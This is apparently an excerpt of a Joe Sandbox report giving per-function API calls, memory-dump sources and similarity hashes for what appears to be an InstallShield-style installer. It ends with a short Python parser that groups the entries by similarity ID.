• CompareFileTime.KERNEL32(?,00000000,?,?,PSTORES.EXE,00000000,00000000,?,?,0000006C,0045932E,00457D82,?,?), ref: 00456C21
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CompareFileH_prolog3Time
• String ID: PSTORES.EXE
• API String ID: 2703394530-1209905799
• Opcode ID: 477db7b0db3111e4d7269be3169a4e76faa47bea44aba997b6f9e44252915542
• Instruction ID: 5a71753b2c1fd2e151c32cf2da638348be322b85b85c0d0e990e6a69628b7215
• Opcode Fuzzy Hash: 477db7b0db3111e4d7269be3169a4e76faa47bea44aba997b6f9e44252915542
• Instruction Fuzzy Hash: 48511272C00159AACF11DF94C8909EEBB78EF08315F95415BE941B7242EB38AA49CB65
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
• Opcode ID: 03c86f5bc84e82cb88f2fe72767ce46c8d3466ba3fe33d34635049310be3e859
• Instruction ID: 58a99352eaeb3b422e1ca34298109bc5b94e88c1d44d0f65b4d1d7b7fabe5789
• Opcode Fuzzy Hash: 03c86f5bc84e82cb88f2fe72767ce46c8d3466ba3fe33d34635049310be3e859
• Instruction Fuzzy Hash: 0231D0723043118BD7209E5CE880B5BF7AAEBD1B65F200A3FE6459B2D1C7B59840C7E9
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042D4CC
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 0042DD62: __EH_prolog3.LIBCMT ref: 0042DD69
  • Part of subcall function 00436FE5: __EH_prolog3_catch_GS.LIBCMT ref: 00436FEF
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 004110EF: __EH_prolog3_GS.LIBCMT ref: 004110F6
  • Part of subcall function 00435B8E: __EH_prolog3_GS.LIBCMT ref: 00435B95
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString$H_prolog3H_prolog3_catch_
• String ID: ProductCode$UpgradeCode
• API String ID: 3764184794-492229846
• Opcode ID: 84a03d970e55444162efa28bfb0c1db6a0e85368541cfce3fbce6b49ee33de9f
• Instruction ID: 8245366d6369e18f813c3e232dac6a3f8eea38d8a1190ac3be5d4a3143b13f4d
• Opcode Fuzzy Hash: 84a03d970e55444162efa28bfb0c1db6a0e85368541cfce3fbce6b49ee33de9f
• Instruction Fuzzy Hash: 90518F71A00258EEDF14DBA0CC91BDDB775BF14304F54409EE149AB1C2DB78AB48CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: HsG$Language
• API String ID: 2427045233-3247321199
• Opcode ID: 830916ef971b7633ac558dd56b10e8013c48ba4c2ccdc50a86a335eccae9759b
• Instruction ID: f494b91f90ea1dbd959871f7f143b356a84e859bb1d67a8eb273efb178d0e523
• Opcode Fuzzy Hash: 830916ef971b7633ac558dd56b10e8013c48ba4c2ccdc50a86a335eccae9759b
• Instruction Fuzzy Hash: 605162B1904208EFDF24DFA5C981ADEB7B5BF08304F20916EE445A7292DB34AE44CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: __getbuf__lseeki64
• String ID: HsG
• API String ID: 275271894-1835203436
• Opcode ID: d80b1a6b87591e685d21bdaeecfd12f1b2b970960cba59133d4d94c991d56d9a
• Instruction ID: 32ae2e38c77818347a773ee92b1fbfbc21dd9289a376d72217f84730e44672e0
• Opcode Fuzzy Hash: d80b1a6b87591e685d21bdaeecfd12f1b2b970960cba59133d4d94c991d56d9a
                                                                                                                                                                          • Instruction Fuzzy Hash: DA411671508B019EF3348F69C88167B77E4AF41334B148A1FECA6863D2D77C9842DB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
• Opcode ID: c22d2277bfc6bba91d7ed89af78dcd5d9fcee578846d8aa8022e915e9aa0ea0e
• Instruction ID: 76a5a4f3226bb77b06694b0b37af88d552583c375612669f6cc30be095a1e04b
• Opcode Fuzzy Hash: c22d2277bfc6bba91d7ed89af78dcd5d9fcee578846d8aa8022e915e9aa0ea0e
• Instruction Fuzzy Hash: A031D2323047149BC724DE1CE88081BF3AAFFD0B15311093FE542D7290DB79A85087A9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045C2DB
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3H_prolog3_
• String ID: HsG$HsG
• API String ID: 852442433-815662401
• Opcode ID: cfa380dcde9affdf3d9b5956ded03d1106393d0d79b409ef4cb7c3de533474e3
• Instruction ID: 8c32c02ba2b969149dc12b168c845890fdc25b02e4ee76d53e79740ee10e4955
• Opcode Fuzzy Hash: cfa380dcde9affdf3d9b5956ded03d1106393d0d79b409ef4cb7c3de533474e3
• Instruction Fuzzy Hash: EF41D571900208EECB14EFA5CC95EEE7B78AF55304F50816EFC05B7182DB745A49CB95
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog3__memset
• String ID: Setup.bmp
• API String ID: 3055368530-70249682
• Opcode ID: e0dca986f198cb1ce27a48e8ca8578c77bc641281ce51a058de874ea4feb1cf4
• Instruction ID: a41fa79c03a2f85a43ef4b6adede775033049b1f3a63376c8f67de41f02d16d7
• Opcode Fuzzy Hash: e0dca986f198cb1ce27a48e8ca8578c77bc641281ce51a058de874ea4feb1cf4
• Instruction Fuzzy Hash: 1C41DB71900319AADB20EB618C417FEB6F8BF08304F4492AEB559E71C1EF789E458F95
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004222E0
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00425CEE: __EH_prolog3.LIBCMT ref: 00425CF5
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorFreeH_prolog3H_prolog3_LastString
• String ID: Extracting resource: %s$msiaction.cpp
• API String ID: 262529356-4212155731
• Opcode ID: 4ad68646dfa4507b5755e510e49a37ed854aa4b08181c71866e27f52f5c0dd0b
• Instruction ID: ef596da4fa047c752b7b38173379f9b1cfaad3b80dd5abd6214fc0e99b0043b9
• Opcode Fuzzy Hash: 4ad68646dfa4507b5755e510e49a37ed854aa4b08181c71866e27f52f5c0dd0b
• Instruction Fuzzy Hash: 7141C170901258EEDB14DBA5CD45BDDB7B4BF11308F4480AEE046B7192EB785F48CB69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00438031
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_
• String ID: %s: %s$HsG
• API String ID: 3339191932-201342294
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00434A9B
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00425CEE: __EH_prolog3.LIBCMT ref: 00425CF5
  • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorH_prolog3_Last$H_prolog3
• String ID: %s: %s$HsG
• API String ID: 3076002782-201342294
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045B86E
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 004560AC: __EH_prolog3_GS.LIBCMT ref: 004560B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_$H_prolog3
• String ID: HsG$HsG
• API String ID: 532146472-815662401
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00416F9D
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog3H_prolog3_catch_
• String ID: HsG$HsG
• API String ID: 863784098-815662401
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041E4D3
                                                                                                                                                                          • CreateDialogIndirectParamW.USER32 ref: 0041E5CC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateDialogH_prolog3_IndirectParam
• String ID: Tahoma
• API String ID: 2249790658-3580928618
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0040F892
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_
• String ID: HsG$\
• API String ID: 3339191932-835423451
                                                                                                                                                                          • Opcode ID: 9fc8f4b8ae0106a6cdd84a157156adafe8898d96288d521826e87ced1c8b384c
                                                                                                                                                                          • Instruction ID: 740425d03abf061617fe193d66f859ce0cc392466863bbfbf0cc7e0d40bce94f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc8f4b8ae0106a6cdd84a157156adafe8898d96288d521826e87ced1c8b384c
                                                                                                                                                                          • Instruction Fuzzy Hash: 27316371900118EADB25EBA1CC56BEEB778BF45308F14413EE502B71C2DB785A0ACF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045C55D
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString$H_prolog3H_prolog3_
• String ID: HsG$HsG
• API String ID: 2488494826-815662401
• Opcode ID: dfae44f96f843d10355139c92cd0617dd2b53f1047f9e39fe6dc0a7cd94907dc
• Instruction ID: 1aa85f8db00f87f3fc68def251aa0362709492a6ca7c5d8c551d9026acc1a480
• Opcode Fuzzy Hash: dfae44f96f843d10355139c92cd0617dd2b53f1047f9e39fe6dc0a7cd94907dc
• Instruction Fuzzy Hash: AF313F71500208EBCB14EFA5C896BDDBB74BF14308F50812EFD1567291DB786A49CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041782D
• DialogBoxIndirectParamW.USER32 ref: 0041791B
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: DialogH_prolog3_IndirectParam
• String ID: Tahoma
• API String ID: 1500191164-3580928618
• Opcode ID: 3eaf27bf9840fc810a34843af5c82f72256ed9753f0bbcb3f9c0fcec4cf0e9f2
• Instruction ID: 98040bdc5672f711545b7cbeb33f8ab8bb1a013a0bc757bd1b330844b4cc0404
• Opcode Fuzzy Hash: 3eaf27bf9840fc810a34843af5c82f72256ed9753f0bbcb3f9c0fcec4cf0e9f2
• Instruction Fuzzy Hash: E6314C30900218EBDB10EBA4C945AEDBBB4BF15308F14409EF845A7292DB799E55DBA4
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: DrD$h6D
• API String ID: 0-1468557914
• Opcode ID: 625b7c75405e260125a4c4236df395d92c6e5a40127ed3a7ac881ca71b4c12bb
• Instruction ID: 34a74892759146525e80f8df49c8b18b9b1fe8cc633a64d69a4d62df9abd21b7
• Opcode Fuzzy Hash: 625b7c75405e260125a4c4236df395d92c6e5a40127ed3a7ac881ca71b4c12bb
• Instruction Fuzzy Hash: DA41B674E04109EFDB04CF98C980AAEB7B2BF49304F248699D415A7345D338AE82DF99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00435685
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0042DC56: __EH_prolog3_GS.LIBCMT ref: 0042DC5D
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: HsG$HsG
• API String ID: 1274762985-815662401
• Opcode ID: 513658718dd9a9e50e3d90ac1006468cf3cbd815c08680c7a3229fdfe3ad6605
• Instruction ID: d4a13f21c85cc622506b4129667b7de6f85281898ff0bfcf78b9f6181efbfc0e
• Opcode Fuzzy Hash: 513658718dd9a9e50e3d90ac1006468cf3cbd815c08680c7a3229fdfe3ad6605
• Instruction Fuzzy Hash: 31318D70A01258EEDB10DBA5C9957EDBBB4BF44308F1441AEE445BB2D2DBB80A49CB45
Uniqueness
Uniqueness Score: -1.00%

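The entries in this section are the sandbox's per-function records: the imports a function reaches directly or through its callees, the memory dump it was recovered from, and the similarity values (API ID, API String ID, Opcode ID, fuzzy hashes) used to match it against functions in other samples. As an added example, not part of the report or of Joe Sandbox's own tooling, here is a small Python parser for exactly this layout. The sample input is constructed from entries listed above (link residue and indentation stripped, some lines trimmed, and the last entry cut off before its Uniqueness line as it is on the page); the `FunctionEntry` record, `first_ref` and the grouping helper are this example's own choices. Grouping by API String ID is one way to surface functions that are near-duplicates of one another, such as the two entries here that both wrap SysFreeString between GetLastError and SetLastError.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the report's own layout (three entries taken from the
# listing above; the third is deliberately truncated before "Uniqueness Score").
SAMPLE = """\
APIs
• __EH_prolog3_GS.LIBCMT ref: 0041782D
• DialogBoxIndirectParamW.USER32 ref: 0041791B
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
Similarity
• API ID: DialogH_prolog3_IndirectParam
• String ID: Tahoma
• API String ID: 1500191164-3580928618
• Opcode ID: 3eaf27bf9840fc810a34843af5c82f72256ed9753f0bbcb3f9c0fcec4cf0e9f2
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00435685
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: HsG$HsG
• API String ID: 1274762985-815662401
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004357BD
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: HsG$HsG
• API String ID: 1274762985-815662401
"""

# "Name.MODULE(args), ref: ADDR" with the argument list and the comma optional.
CALL_RE = re.compile(r"^(?P<api>[\w.]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s+(?P<call>.+)$")
SOURCE_RE = re.compile(r"^Source File:\s+(?P<file>\S+), Offset:\s+(?P<offset>[0-9A-Fa-f]+), based on PE:\s+(?P<pe>\w+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")


@dataclass
class FunctionEntry:
    apis: List[Dict[str, str]] = field(default_factory=list)      # direct calls: api, args, ref
    subcalls: List[Dict[str, str]] = field(default_factory=list)  # calls reached via callees, plus caller
    fields: Dict[str, str] = field(default_factory=dict)          # API ID, Opcode ID, Uniqueness Score, ...
    associated: List[str] = field(default_factory=list)           # other dumps of the same image

    @property
    def first_ref(self) -> Optional[str]:
        """Address of the first direct call; the listing gives no function start, so use this as the handle."""
        return self.apis[0]["ref"] if self.apis else None

    def api_names(self) -> List[str]:
        """Distinct import names (module suffix dropped) reached directly or through subcalls."""
        return sorted({c["api"].split(".")[0] for c in self.apis + self.subcalls})

    def callers(self) -> List[str]:
        return sorted({c["caller"] for c in self.subcalls})


def _call(m: "re.Match[str]") -> Dict[str, str]:
    return {"api": m["api"], "args": m["args"] or "", "ref": m["ref"].upper()}


def parse_report(text: str) -> List[FunctionEntry]:
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # bullets and indentation carry no data
        if not line:
            continue
        if m := SUBCALL_RE.match(line):           # must be tried before the generic key/value form
            if cm := CALL_RE.match(m["call"]):
                cur.subcalls.append({**_call(cm), "caller": m["caller"].upper()})
        elif m := CALL_RE.match(line):
            cur.apis.append(_call(m))
        elif m := SOURCE_RE.match(line):
            cur.fields.update({"Source File": m["file"], "Offset": m["offset"], "Based on PE": m["pe"]})
        elif line.startswith("Associated: "):
            cur.associated.append(line.split(": ", 1)[1])
        elif m := KV_RE.match(line):
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Uniqueness Score":    # last line of an entry: flush it
                entries.append(cur)
                cur = FunctionEntry()
        # bare headers ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness") are skipped
    if cur.apis or cur.fields:                    # entry cut off before its Uniqueness line
        entries.append(cur)
    return entries


def group_by(entries: List[FunctionEntry], key: str) -> Dict[str, List[Optional[str]]]:
    """Map each distinct value of `key` (e.g. 'API String ID') to the functions that carry it."""
    groups: Dict[str, List[Optional[str]]] = {}
    for e in entries:
        if key in e.fields:
            groups.setdefault(e.fields[key], []).append(e.first_ref)
    return groups
```

Run `group_by(parse_report(SAMPLE), "API String ID")` to see the two ErrorLast/FreeString functions fall into one bucket; feeding the parser a whole report and grouping on "Opcode ID" or "Instruction Fuzzy Hash" instead gives the identifiers to search for in other reports.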
APIs
